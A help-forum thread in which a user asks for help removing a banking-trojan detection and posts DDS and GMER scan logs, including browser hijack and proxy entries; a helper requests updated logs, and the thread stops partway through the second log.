manoelvalerio

Remove threat JS: Banker-QG[Trj]


Good morning!

The Avast on my PC raises an alert for the infection: JS: Banker-QG[Trj].

The analyst diego_moicano resolved the same infection on 15/11/13. Can I use that solution, or should I wait for a response to my scans?

Here are the scans, as requested by the forum.

Thanks in advance.

DDS (Ver_2012-11-20.01) - NTFS_x86

Internet Explorer: 10.0.9200.16736 BrowserJavaVersion: 10.45.2

Run by 2011 at 11:11:02 on 2013-11-17

Microsoft Windows 7 Ultimate 6.1.7601.1.1252.55.1046.18.2046.1017 [GMT -2:00]

.

AV: avast! Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}

SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

SP: avast! Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

.

============== Running Processes ================

.

C:\Windows\system32\wininit.exe

C:\Windows\system32\lsm.exe

C:\Program Files\Software Plate\svcgdp.exe

C:\Program Files\AVAST Software\Avast\AvastSvc.exe

C:\Windows\system32\Dwm.exe

C:\Windows\Explorer.EXE

C:\ProgramData\eSafe\eGdpSvc.exe

C:\Windows\system32\taskhost.exe

C:\Program Files\AVAST Software\Avast\AvastUI.exe

C:\Program Files\Common Files\Java\Java Update\jusched.exe

C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe

C:\Windows\System32\spoolsv.exe

C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Windows\system32\SearchIndexer.exe

C:\Program Files\Windows Media Player\wmpnetwk.exe

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\explorer.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe -k GPSvcGroup

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\svchost.exe -k imgsvc

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

.

============== Pseudo HJT Report ===============

.

uStart Page = hxxp://www.22find.com/newtab?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149649

uDefault_Page_URL = hxxp://www.22find.com/newtab?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149649

mSearchAssistant = hxxp://search.22find.com/web/?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149651

mCustomizeSearch = hxxp://search.22find.com/web/?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149651

BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office14\GROOVEEX.DLL

BHO: Java Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll

BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL

BHO: SpeedBit Link Verification Helper: {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - c:\program files\dap\LinkVerifier.dll

BHO: Java Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll

TB: Google Toolbar: {2318C2B1-4965-11D4-9B18-009027A5CD4F} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

uRun: [F.lux] "c:\users\2011\local settings\apps\f.lux\flux.exe" /noshow

uRun: [swg] "c:\program files\google\googletoolbarnotifier\GoogleToolbarNotifier.exe"

uRun: [Google Update] "c:\users\2011\appdata\local\google\update\GoogleUpdate.exe" /c

mRun: [AvastUI.exe] "c:\program files\avast software\avast\AvastUI.exe" /nogui

mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"

mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"

mPolicies-System: ConsentPromptBehaviorAdmin = dword:5

mPolicies-System: ConsentPromptBehaviorUser = dword:3

mPolicies-System: EnableUIADesktopToggle = dword:0

IE: &Download with &DAP - c:\program files\dap\dapextie.htm

IE: &Verify with DAP - c:\program files\dap\dapverify.htm

IE: Download &all with DAP - c:\program files\dap\dapextie2.htm

IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office10\EXCEL.EXE/3000

IE: E&xportar para o Microsoft Excel - c:\progra~1\micros~2\office11\EXCEL.EXE/3000

IE: Sothink Flash Downloader For IE - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm

IE: {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm

DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

TCP: NameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

TCP: Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439} : DHCPNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL

Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll

Name-Space Handler: FTP\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\dap\dapie.dll

Name-Space Handler: HTTP\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\dap\dapie.dll

SSODL: WebCheck - <orphaned>

SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office14\GROOVEEX.DLL

.

================= FIREFOX ===================

.

FF - ProfilePath - c:\users\2011\appdata\roaming\mozilla\firefox\profiles\1t2pwtzw.default\

FF - prefs.js: browser.search.selectedEngine - Google

FF - prefs.js: browser.startup.homepage - hxxp://www.22find.com/?utm_source=b&utm_medium=gdp&from=gdp&uid=WDCXWD2500JS-75NCB3_WD-WCANKJ05479754797&ts=1359149644

FF - prefs.js: network.proxy.http - 189.112.117.5

FF - prefs.js: network.proxy.type - 2

FF - plugin: c:\progra~1\micros~2\office14\NPAUTHZ.DLL

FF - plugin: c:\progra~1\micros~2\office14\NPSPWRAP.DLL

FF - plugin: c:\program files\adobe\reader 10.0\reader\air\nppdf32.dll

FF - plugin: c:\program files\foxit software\foxit reader\plugins\npFoxitReaderPlugin.dll

FF - plugin: c:\program files\google\update\1.3.21.165\npGoogleUpdate3.dll

FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll

FF - plugin: c:\users\2011\appdata\local\google\update\1.3.21.165\npGoogleUpdate3.dll

FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_8_800_168.dll

FF - plugin: c:\windows\system32\npDeployJava1.dll

FF - plugin: c:\windows\system32\npmproxy.dll

.

============= SERVICES / DRIVERS ===============

.

R0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2013-3-3 49944]

R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2013-3-3 178304]

R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2012-8-6 774392]

R1 aswSP;aswSP;c:\windows\system32\drivers\aswsp.sys [2013-11-8 403440]

R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver;c:\windows\system32\drivers\dtsoftbus01.sys [2012-9-15 242240]

R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2012-8-6 35656]

R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2012-8-6 70384]

R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2013-11-8 50344]

R2 svcgdp;software services;c:\program files\software plate\svcgdp.exe [2012-9-24 92800]

R2 WsysSvc;Wsys Service;c:\programdata\esafe\eGdpSvc.exe [2013-8-15 303680]

S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]

S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2013-6-21 162408]

S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]

S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2013-4-25 14848]

S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2013-4-25 49664]

S4 KMService;KMService;c:\windows\system32\srvany.exe [2012-8-7 8192]

.

=============== Created Last 30 ================

.

2013-11-13 01:25:21 1796096 ----a-w- c:\windows\system32\authui.dll

2013-10-24 11:51:52 94632 ----a-w- c:\windows\system32\WindowsAccessBridge.dll

2013-10-22 00:33:44 -------- d-----w- c:\users\2011\appdata\roaming\AVAST Software

.

==================== Find3M ====================

.

2013-11-09 00:36:36 774392 ----a-w- c:\windows\system32\drivers\aswSnx.sys

2013-11-09 00:36:36 70384 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys

2013-11-09 00:36:35 43152 ----a-w- c:\windows\avastSS.scr

2013-10-21 16:12:37 79720 ----a-w- c:\windows\system32\drivers\aswRdr2.sys

2013-10-21 16:12:37 49944 ----a-w- c:\windows\system32\drivers\aswRvrt.sys

2013-10-21 16:12:37 178304 ----a-w- c:\windows\system32\drivers\aswVmm.sys

2013-10-12 07:03:50 1767936 ----a-w- c:\windows\system32\wininet.dll

2013-10-12 07:02:33 2877952 ----a-w- c:\windows\system32\jscript9.dll

2013-10-12 07:02:29 61440 ----a-w- c:\windows\system32\iesetup.dll

2013-10-12 07:02:29 109056 ----a-w- c:\windows\system32\iesysprep.dll

2013-10-12 06:08:58 2706432 ----a-w- c:\windows\system32\mshtml.tlb

2013-10-12 05:15:39 71680 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe

2013-10-12 02:03:08 656896 ----a-w- c:\windows\system32\nshwfp.dll

2013-10-12 02:01:41 679424 ----a-w- c:\windows\system32\IKEEXT.DLL

2013-10-12 02:01:25 216576 ----a-w- c:\windows\system32\FWPUCLNT.DLL

2013-10-09 02:56:36 71048 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl

2013-10-09 02:56:36 692616 ----a-w- c:\windows\system32\FlashPlayerApp.exe

2013-10-05 19:57:25 1168384 ----a-w- c:\windows\system32\crypt32.dll

2013-10-04 01:58:50 152576 ----a-w- c:\windows\system32\SmartcardCredentialProvider.dll

2013-10-04 01:56:25 168960 ----a-w- c:\windows\system32\credui.dll

2013-10-03 01:58:07 305152 ----a-w- c:\windows\system32\gdi32.dll

2013-09-25 02:01:08 136640 ----a-w- c:\windows\system32\drivers\ksecpkg.sys

2013-09-25 02:01:06 67520 ----a-w- c:\windows\system32\drivers\ksecdd.sys

2013-09-25 01:57:46 99840 ----a-w- c:\windows\system32\sspicli.dll

2013-09-25 01:57:26 22016 ----a-w- c:\windows\system32\secur32.dll

2013-09-25 01:57:24 247808 ----a-w- c:\windows\system32\schannel.dll

2013-09-25 01:56:42 220160 ----a-w- c:\windows\system32\ncrypt.dll

2013-09-25 01:56:02 1038848 ----a-w- c:\windows\system32\lsasrv.dll

2013-09-25 00:49:20 22016 ----a-w- c:\windows\system32\lsass.exe

2013-09-25 00:49:18 15872 ----a-w- c:\windows\system32\sspisrv.dll

2013-09-14 00:48:58 338944 ----a-w- c:\windows\system32\drivers\afd.sys

2013-09-08 02:07:12 1294272 ----a-w- c:\windows\system32\drivers\tcpip.sys

2013-09-08 02:03:58 231424 ----a-w- c:\windows\system32\mswsock.dll

2013-09-04 01:15:32 258560 ----a-w- c:\windows\system32\drivers\usbhub.sys

2013-09-04 01:14:52 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys

2013-09-04 01:14:52 284672 ----a-w- c:\windows\system32\drivers\usbport.sys

2013-09-04 01:14:45 43008 ----a-w- c:\windows\system32\drivers\usbehci.sys

2013-09-04 01:14:45 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys

2013-09-04 01:14:43 24064 ----a-w- c:\windows\system32\drivers\usbuhci.sys

2013-09-04 01:14:40 6016 ----a-w- c:\windows\system32\drivers\usbd.sys

2013-08-29 01:51:45 3969472 ----a-w- c:\windows\system32\ntkrnlpa.exe

2013-08-29 01:51:45 3914176 ----a-w- c:\windows\system32\ntoskrnl.exe

2013-08-29 01:50:30 1289096 ----a-w- c:\windows\system32\ntdll.dll

2013-08-29 01:50:16 619520 ----a-w- c:\windows\system32\tdh.dll

2013-08-29 01:48:17 640512 ----a-w- c:\windows\system32\advapi32.dll

2013-08-28 01:04:30 2348544 ----a-w- c:\windows\system32\win32k.sys

2013-08-28 00:57:20 434688 ----a-w- c:\windows\system32\scavengeui.dll

2013-08-24 11:59:27 773800 ----a-w- c:\windows\system32\msvcr100.dll

2013-08-24 11:59:26 421032 ----a-w- c:\windows\system32\msvcp100.dll

.

============= FINISH: 11:12:03,30 ===============

.

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.

IF REQUESTED, ZIP IT UP & ATTACH IT

.

DDS (Ver_2012-11-20.01)

.

Microsoft Windows 7 Ultimate

Boot Device: \Device\HarddiskVolume1

Install Date: 29/09/2011 10:03:29

System Uptime: 17/11/2013 10:28:59 (1 hours ago)

.

Motherboard: Dell Inc. | | 0WG864

Processor: Intel® Core2 CPU 6320 @ 1.86GHz | Microprocessor | 1862/1066mhz

.

==== Disk Partitions =========================

.

A: is Removable

C: is FIXED (NTFS) - 233 GiB total, 103,305 GiB free.

D: is CDROM ()

E: is CDROM ()

.

==== Disabled Device Manager Items =============

.

==== System Restore Points ===================

.

RP97: 24/10/2013 09:50:43 - Installed Java 7 Update 45

RP98: 31/10/2013 17:30:03 - Ponto de Verificação Agendado

RP100: 08/11/2013 22:35:17 - avast! antivirus system restore point

RP101: 13/11/2013 00:31:54 - Windows Update

.

==== Installed Programs ======================

.

Adobe Flash Player 11 ActiveX

Adobe Flash Player 11 Plugin

Adobe Reader X (10.1.8)

µTorrent

avast! Free Antivirus

BS.Player FREE

BS.Player PRO

CCleaner

CDBurnerXP

DAEMON Tools Lite

Daum PotPlayer 1.5.37776

Download Accelerator Plus (DAP)

F.lux

FormatFactory 3.1.1

Foxit Reader

Google Chrome

Google Toolbar for Internet Explorer

Google Update Helper

Java 7 Update 45

Java Auto Updater

Java 6 Update 30

JavaFX 2.1.1

K-Lite Codec Pack 9.1.0 (Full)

Microsoft .NET Framework 4 Client Profile

Microsoft Office 2010 Service Pack 1 (SP1)

Microsoft Office Access MUI (English) 2010

Microsoft Office Access Setup Metadata MUI (English) 2010

Microsoft Office Excel MUI (English) 2010

Microsoft Office Groove MUI (English) 2010

Microsoft Office InfoPath MUI (English) 2010

Microsoft Office OneNote MUI (English) 2010

Microsoft Office Outlook MUI (English) 2010

Microsoft Office PowerPoint MUI (English) 2010

Microsoft Office Professional Plus 2010

Microsoft Office Proof (English) 2010

Microsoft Office Proof (French) 2010

Microsoft Office Proof (Spanish) 2010

Microsoft Office Proofing (English) 2010

Microsoft Office Publisher MUI (English) 2010

Microsoft Office Shared MUI (English) 2010

Microsoft Office Shared Setup Metadata MUI (English) 2010

Microsoft Office Word MUI (English) 2010

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Mozilla Firefox 20.0.1 (x86 pt-BR)

Mozilla Maintenance Service

PDFCreator

Quake III Arena

Samsung ML-1860 Series

Samsung Printer Live Update

Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2686827)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2729449)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2737019)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2742595)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2789642)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2804576)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2835393)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2858302v2)

Skype™ 6.6

Sothink SWF Decompiler

StreamTransport version: 1.0.2.2171

Update for Microsoft .NET Framework 4 Client Profile (KB2468871)

Update for Microsoft .NET Framework 4 Client Profile (KB2533523)

Update for Microsoft .NET Framework 4 Client Profile (KB2600217)

Update for Microsoft .NET Framework 4 Client Profile (KB2836939)

Update for Microsoft .NET Framework 4 Client Profile (KB2836939v3)

VLC media player 2.0.4

Winamp

Windows Media Player Firefox Plugin

WinRAR 4.10 (32-bit)

.

==== End Of File ===========================

GMER 2.1.19163 - http://www.gmer.net

Rootkit scan 2013-11-17 12:02:17

Windows 6.1.7601 Service Pack 1 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 WDC_WD25 rev.10.0 232,83GB

Running: gmer.exe; Driver: C:\Users\2011\AppData\Local\Temp\pxldipog.sys

---- System - GMER 2.1 ----

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwAddBootEntry [0x8D27CB10]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwAssignProcessToJobObject [0x8D27D5EE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateEvent [0x8D2895E0]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateEventPair [0x8D28962C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateIoCompletion [0x8D2897C6]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateMutant [0x8D28954E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateSection [0x8D289670]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateSemaphore [0x8D289596]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateThread [0x8D27DB24]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateThreadEx [0x8D27DD40]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateTimer [0x8D289780]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDebugActiveProcess [0x8D27E3DC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDeleteBootEntry [0x8D27CB76]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDuplicateObject [0x8D281B58]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwLoadDriver [0x8D27C75E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwModifyBootEntry [0x8D27CBDC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwNotifyChangeKey [0x8D281F4E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwNotifyChangeMultipleKeys [0x8D27EE6C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenEvent [0x8D28960A]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenEventPair [0x8D28964E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenIoCompletion [0x8D2897EA]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenMutant [0x8D289574]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenProcess [0x8D281452]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenSection [0x8D2896FE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenSemaphore [0x8D2895BE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenThread [0x8D28183A]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenTimer [0x8D2897A4]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwProtectVirtualMemory [0x914290CC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwQueryObject [0x8D27ED38]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwQueueApcThreadEx [0x8D27EA46]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetBootEntryOrder [0x8D27CC42]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetBootOptions [0x8D27CCA8]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwSetContextThread [0x91429316]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetSystemInformation [0x8D27C7F8]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetSystemPowerState [0x8D27C9CE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwShutdownSystem [0x8D27C95C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSuspendProcess [0x8D27E5A6]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSuspendThread [0x8D27E708]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSystemDebugControl [0x8D27CA56]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwTerminateProcess [0x91429194]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwTerminateThread [0x8D27E236]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwVdmControl [0x8D27CD0E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwWriteVirtualMemory [0x8D27D64A]

---- Kernel code sections - GMER 2.1 ----

.text ntkrnlpa.exe!ZwRollbackEnlistment + 142D 82A82A15 1 Byte [06]

.text ntkrnlpa.exe!KiDispatchInterrupt + 5A2 82ABC212 19 Bytes [E0, 0F, BA, F0, 07, 73, 09, ...] {LOOPNZ 0x11; MOV EDX, 0x97307f0; MOV CR4, EAX; OR AL, 0x80; MOV CR4, EAX; RET ; MOV ECX, CR3}

.text ntkrnlpa.exe!KeRemoveQueueEx + 10CB 82AC3460 4 Bytes [10, CB, 27, 8D]

.text ntkrnlpa.exe!KeRemoveQueueEx + 1153 82AC34E8 4 Bytes [EE, D5, 27, 8D]

.text ntkrnlpa.exe!KeRemoveQueueEx + 11A7 82AC353C 8 Bytes [E0, 95, 28, 8D, 2C, 96, 28, ...] {LOOPNZ 0xffffff97; SUB [EBP-0x72d769d4], CL}

.text ntkrnlpa.exe!KeRemoveQueueEx + 11B3 82AC3548 4 Bytes [C6, 97, 28, 8D]

.text ntkrnlpa.exe!KeRemoveQueueEx + 11CF 82AC3564 4 Bytes [4E, 95, 28, 8D]

.text ...

.text C:\Windows\system32\drivers\atikmdag.sys section is writeable [0x91C0B000, 0x227A14, 0xE8000020]

? C:\Users\2011\AppData\Local\Temp\mbr.sys O sistema não pode encontrar o arquivo especificado. !

---- User code sections - GMER 2.1 ----

.text C:\Windows\system32\csrss.exe[424] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text C:\Windows\system32\wininit.exe[496] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text C:\Windows\system32\csrss.exe[504] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text C:\Windows\system32\services.exe[544] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text C:\Windows\system32\lsass.exe[560] kernel32.dll!GetBinaryTypeW + 70 779969E4 1 Byte [62]

.text ...

---- Devices - GMER 2.1 ----

AttachedDevice \Driver\tdx \Device\Tcp aswTdi.sys

AttachedDevice \Driver\tdx \Device\Udp aswTdi.sys

---- Registry - GMER 2.1 ----

Reg HKLM\SOFTWARE\Microsoft\Windows Search\UsnNotifier\Windows\Catalogs\SystemIndex@{674D35C8-EA99-11E0-8C2B-806E6F6E6963} 4840062704

---- EOF - GMER 2.1 ----

---

Thank you!

Manoel.


Hello

Sorry for the delay :)

If you still need help, redo the logs, since I need them with updated dates: Read Before Posting - Creating a New Topic

ATTENTION 1: There is no need to open a new topic; post the new logs in this same topic, thank you!

ATTENTION 2: Do not edit your topic; use the reply button, thank you!

ATTENTION 3: Do not put the logs between TAGS, thank you!

ATTENTION 4: Do not attach the logs, thank you!

Regards :D


Good evening Diego. I still need your help!

Here are the updated logs, as requested.

Regards!

DDS (Ver_2012-11-20.01) - NTFS_x86

Internet Explorer: 10.0.9200.16736 BrowserJavaVersion: 10.45.2

Run by 2011 at 23:13:55 on 2013-11-20

Microsoft Windows 7 Ultimate 6.1.7601.1.1252.55.1046.18.2046.960 [GMT -2:00]

.

AV: avast! Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}

SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

SP: avast! Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

.

============== Running Processes ================

.

C:\Windows\system32\wininit.exe

C:\Windows\system32\lsm.exe

C:\Program Files\Software Plate\svcgdp.exe

C:\Program Files\AVAST Software\Avast\AvastSvc.exe

C:\Windows\system32\Dwm.exe

C:\Windows\Explorer.EXE

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\taskhost.exe

C:\Program Files\AVAST Software\Avast\AvastUI.exe

C:\Program Files\Common Files\Java\Java Update\jusched.exe

C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe

C:\Windows\system32\SearchIndexer.exe

C:\Program Files\Windows Media Player\wmpnetwk.exe

C:\Windows\explorer.exe

C:\Program Files\Winamp\winamp.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Program Files\DAP\DAP.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Users\2011\AppData\Local\Google\Chrome\Application\chrome.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe -k GPSvcGroup

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\svchost.exe -k imgsvc

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

.

============== Pseudo HJT Report ===============

.

uStart Page = hxxp://www.google.com

uDefault_Page_URL = hxxp://www.google.com

mSearchAssistant = hxxp://www.google.com

mCustomizeSearch = hxxp://www.google.com

BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office14\GROOVEEX.DLL

BHO: Java Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll

BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

